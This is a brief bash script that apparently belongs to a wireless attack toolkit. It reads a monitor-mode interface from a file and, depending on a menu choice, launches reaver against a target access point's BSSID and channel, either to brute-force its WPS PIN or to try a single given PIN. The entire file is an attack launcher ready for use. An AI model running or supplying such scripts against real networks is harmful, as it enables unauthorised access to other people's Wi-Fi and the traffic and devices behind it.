#! /bin/bash
WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
if [ "$GLV" = "2" ]
then
	echo -e "Please note that you need a very good signal for this to work."
	sleep 3
	echo -e "Starting..."
	sleep 1
	clear
	reaver -i $WLANNM -b $BSSIDT -d $DELT -S -N -c $CHANT -vv 
	echo -e "Press \e[1;33many key\e[0m to continue..." 
	read
elif [ "$GLV" = "3" ]
then
	reaver -i $WLANNM -b $BSSIDT -p $WPST -vv
	echo -e "Press \e[1;33many key\e[0m to continue..."
	read

fi
